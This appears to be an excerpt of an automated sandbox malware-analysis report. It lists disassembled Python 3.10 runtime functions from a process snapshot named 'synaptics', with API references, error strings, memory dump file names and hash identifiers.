                                                                                                                                                                                                      • Instruction ID: 08b2d219eaa85f4f8ac58cea3578154ad160bfb4d974fccabaf615e7172cf8e8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a89c50c47fb4b9175b3acee4d9a699338f9e11427759194b605b8cdef666c7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5531EA717113119BDB00AF19EC05A56BFF5EB8131AF24C276E908C7B51EB31E854CBA1
                                                                                                                                                                                                      Function 6C569B30 Relevance: 12.1, APIs: 8, Instructions: 101COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C535380,?,?,00000000,?,?,?,?,?,?,?,?), ref: 6C569B53
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyEval_SaveThread,?,?,?,?,?,?,?,?,?), ref: 6C569C73
                                                                                                                                                                                                      • _set_thread_local_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C535380,00000000,00000000,?,?,6C58C5B8,00000000,Fatal Python error: ,00000014), ref: 6C569CA1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _set_thread_local_invalid_parameter_handler$Error_FatalTstate
                                                                                                                                                                                                      • String ID: Osi$PyEval_SaveThread$open
                                                                                                                                                                                                      • API String ID: 2191374408-3428564579
                                                                                                                                                                                                      • Opcode ID: 97ebaaf2273afbd8f03d9977d95bc811f95d5bb9ccd53a41f175b7224be317bc
                                                                                                                                                                                                      • Instruction ID: b6e0dcdab5004368cdade6fb2a34b6c3f562582bea4a63e18e57edc93d6f443b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97ebaaf2273afbd8f03d9977d95bc811f95d5bb9ccd53a41f175b7224be317bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1831F271A046188FDB029F26DC4495A77B0EF86328F054639E81887B60EB31FC54CBD6
                                                                                                                                                                                                      Function 6C466EE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 130COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_Realloc.PYTHON310(?,?,?,?,?,?,?,6C467443,?,?,?,?,?,?,?,6C467525), ref: 6C466F8B
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000), ref: 6C466FB0
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\bytesobject.c,00000BF7,?,?,?,?,?,6C467443,?,?,?,?,?,?), ref: 6C467028
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C46701C
                                                                                                                                                                                                      • D:\a\1\s\Objects\bytesobject.c, xrefs: 6C467017
                                                                                                                                                                                                      • @xJl, xrefs: 6C466FA4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatMemoryObject_Realloc
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$@xJl$D:\a\1\s\Objects\bytesobject.c
                                                                                                                                                                                                      • API String ID: 4025013585-2996074263
                                                                                                                                                                                                      • Opcode ID: f70a68dd516bcc388bd0723db2970a38d82a7ae4d6a7a39190b68b619b89adf6
                                                                                                                                                                                                      • Instruction ID: 3c6e9dc2329378120c5d93dcebdf9d637d1c68f6297d24213e502dca641c2b19
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f70a68dd516bcc388bd0723db2970a38d82a7ae4d6a7a39190b68b619b89adf6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41B0717146019FC710CF6AD840E96B7F4EF8533AF1447A9E828CBBA4EB31E8458B91
                                                                                                                                                                                                      Function 6C467AB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,'%.200s' object does not support vectorcall,?), ref: 6C467AE1
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%R returned NULL without setting an exception,00000000), ref: 6C467B7B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %R returned NULL without setting an exception, xrefs: 6C467B6F
                                                                                                                                                                                                      • %R returned a result with an exception set, xrefs: 6C467BA2
                                                                                                                                                                                                      • '%.200s' object does not support vectorcall, xrefs: 6C467AD5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %R returned NULL without setting an exception$%R returned a result with an exception set$'%.200s' object does not support vectorcall
                                                                                                                                                                                                      • API String ID: 376477240-1148507244
                                                                                                                                                                                                      • Opcode ID: 6d38dfc3d0a7f391f78a627115f20ffaea6775a20c28b0158faa2dd6050c75ef
                                                                                                                                                                                                      • Instruction ID: 486a7819cc06fd0ec1449ce88bb947a2f1ef16f20ec5d1b51d51e1d0f50ef066
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d38dfc3d0a7f391f78a627115f20ffaea6775a20c28b0158faa2dd6050c75ef
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E3123767042059BDB00DE6ADC41D9BB7A9EFC422AF14466AFC18C7B01EB31E9118BE1
                                                                                                                                                                                                      Function 6C47FB90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310('path' must be 'str', not '%.200s',?), ref: 6C47FBB3
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearFromObjectUnicode_
                                                                                                                                                                                                      • String ID: 'path' must be 'str', not '%.200s'$_io
                                                                                                                                                                                                      • API String ID: 4090262012-1460365991
                                                                                                                                                                                                      • Opcode ID: c1166e318a029cda4f2589dcd73ec17744745d84231212b64404ff7256e9a7d0
                                                                                                                                                                                                      • Instruction ID: fdf2dd0c44d7e8b65378cadc5a629cff2a8d4c2f25d7f0536ce47223c9374a31
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1166e318a029cda4f2589dcd73ec17744745d84231212b64404ff7256e9a7d0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87112B727062056FE720CA98EC40DD677A9AF4127D7140639E92C87B51D72AE817C7A1
                                                                                                                                                                                                      Function 6C468430 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(?), ref: 6C46844A
                                                                                                                                                                                                      • PyObject_GetAttr.PYTHON310(?,00000000), ref: 6C468458
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,attribute of type '%.200s' is not callable,?), ref: 6C46847E
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C4684CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C4684BE
                                                                                                                                                                                                      • attribute of type '%.200s' is not callable, xrefs: 6C468472
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$AttrFormatFromObject_StringUnicode_
                                                                                                                                                                                                      • String ID: attribute of type '%.200s' is not callable$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 2929278046-1575836955
                                                                                                                                                                                                      • Opcode ID: 71244fed4d3806b99f3000b9d96275913f68d3188f71b223bf3335d1d6c82056
                                                                                                                                                                                                      • Instruction ID: 58802f9f013c80e7d95b73c05f7984afc29a6797883a7830780babd2423e893b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71244fed4d3806b99f3000b9d96275913f68d3188f71b223bf3335d1d6c82056
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55112772A00115ABDB00DA56DC00E9B73A9AB8277AF044026EC1897F44FB75EC26C7E1
                                                                                                                                                                                                      Function 6C577A00 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,-000000FF,00000000,00000000,6C5872F3), ref: 6C577A16
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,00000000,6C5872F3,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C577A28
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,bad argument type for built-in operation,?,?,00000000,6C5872F3), ref: 6C577A45
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • PyModule_GetState.PYTHON310(00000000,-000000FF,00000000,00000000,6C5872F3), ref: 6C577A5B
                                                                                                                                                                                                      • PyModule_ExecDef.PYTHON310(00000000,?,6C5872F3,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C577A69
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bad argument type for built-in operation, xrefs: 6C577A39
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Module_SubtypeType_$ExecObjectStateString
                                                                                                                                                                                                      • String ID: bad argument type for built-in operation
                                                                                                                                                                                                      • API String ID: 4002453562-2291703510
                                                                                                                                                                                                      • Opcode ID: 9259eebd9e0f3bf672bf7be15ecdf02170d7f17b351cbde2a4ee2a47488cf422
                                                                                                                                                                                                      • Instruction ID: 6706d214c6150d16741b0927cc680a26975068069264dfa1199d0a71240ead2e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9259eebd9e0f3bf672bf7be15ecdf02170d7f17b351cbde2a4ee2a47488cf422
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF050B7F4510067AA16A1667D01D9F736DCAD109FB18403DF90AE2F01F721E76542F1
                                                                                                                                                                                                      Function 6C576710 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_EqualToASCIIString.PYTHON310(00000000,?,00000000,6C5872BD,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C576749
                                                                                                                                                                                                        • Part of subcall function 6C4E6510: _PyUnicode_Ready.PYTHON310(?), ref: 6C4E651E
                                                                                                                                                                                                        • Part of subcall function 6C4E6510: _PyErr_Clear.PYTHON310(?), ref: 6C4E6531
                                                                                                                                                                                                      • PyImport_AddModuleObject.PYTHON310(00000000,?,?,00000000,6C5872BD,00000000), ref: 6C576779
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,?,?,00000000,6C5872BD,00000000), ref: 6C5767A6
                                                                                                                                                                                                      • PyModule_GetDef.PYTHON310(00000000,?,?,?,?,00000000,6C5872BD,00000000), ref: 6C5767B3
                                                                                                                                                                                                      • _PyImport_FixupExtensionObject.PYTHON310(00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,6C5872BD,00000000), ref: 6C5767CB
                                                                                                                                                                                                      • PyModule_FromDefAndSpec2.PYTHON310(00000000,6C5872BD,000003F5,?,?,00000000,6C5872BD,00000000), ref: 6C5767E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Import_Module_ObjectUnicode_$ClearEqualErr_ExtensionFixupFromModuleReadySpec2StringSubtypeType_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 977127474-0
                                                                                                                                                                                                      • Opcode ID: ec7b2121564f8dc7b6c609835d1044d502a33b8cd3a2abafdea487a95e52aa7f
                                                                                                                                                                                                      • Instruction ID: 6ce949d74c1e5442c90d7e7780b48c770fa508631d123ef84744f77ccd4282c0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec7b2121564f8dc7b6c609835d1044d502a33b8cd3a2abafdea487a95e52aa7f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B210A76B0030557D7309A6ABD81EA6B3FCDB802AEB54017AED0CD2B11FB25D85586B1
                                                                                                                                                                                                      Function 6C3EB390 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,00000150,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3EB461
                                                                                                                                                                                                      • _PyErr_WriteUnraisableMsg.PYTHON310(in tp_clear of,00000020,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3EB4FA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C3EB455
                                                                                                                                                                                                      • in tp_clear of, xrefs: 6C3EB4F5
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C3EB450
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatUnraisableWrite
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c$in tp_clear of
                                                                                                                                                                                                      • API String ID: 432608161-966836074
                                                                                                                                                                                                      • Opcode ID: 5f67e3309bfbd743701e1839356d7b1b99791c6b7c5dd8836bcab2d9045a5b26
                                                                                                                                                                                                      • Instruction ID: 08e2e2ae3ce6c3c5226aeb974a08184482866bcb6b2522757f5de74137070d8e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f67e3309bfbd743701e1839356d7b1b99791c6b7c5dd8836bcab2d9045a5b26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF516A71A016159FC701CF59C980A85F7F0FF49328B2582AAE9689FBA1D372ED41CF94
                                                                                                                                                                                                      Function 6C467830 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%R returned NULL without setting an exception,?), ref: 6C4678F4
                                                                                                                                                                                                      • _PyErr_FormatFromCauseTstate.PYTHON310(?,%R returned a result with an exception set,?), ref: 6C467927
                                                                                                                                                                                                        • Part of subcall function 6C468B10: PyTuple_New.PYTHON310(?), ref: 6C468B6B
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,?,?,?,?), ref: 6C467945
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %R returned NULL without setting an exception, xrefs: 6C4678E8
                                                                                                                                                                                                      • %R returned a result with an exception set, xrefs: 6C46791B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
